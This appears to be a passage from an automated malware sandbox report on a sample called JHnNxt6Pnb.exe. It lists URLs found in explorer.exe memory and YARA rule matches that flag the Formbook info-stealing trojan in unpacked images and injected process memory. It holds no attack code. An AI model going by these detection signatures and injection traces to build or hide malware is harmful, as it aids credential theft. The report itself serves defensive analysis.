            Source: explorer.exe, 00000006.00000002.4005157734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000006.00000002.4005157734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.com
            Source: explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
            Source: explorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
            Source: explorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comer
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000006.00000003.2657529257.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2288001841.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077089186.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4008024188.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/EM0
            Source: explorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com48
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
            Source: explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed

            E-Banking Fraud

            Source: Yara match | File source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.4011430051.00000000115F5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: JHnNxt6Pnb.exe PID: 6796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: JHnNxt6Pnb.exe PID: 964, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: ipconfig.exe PID: 5460, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
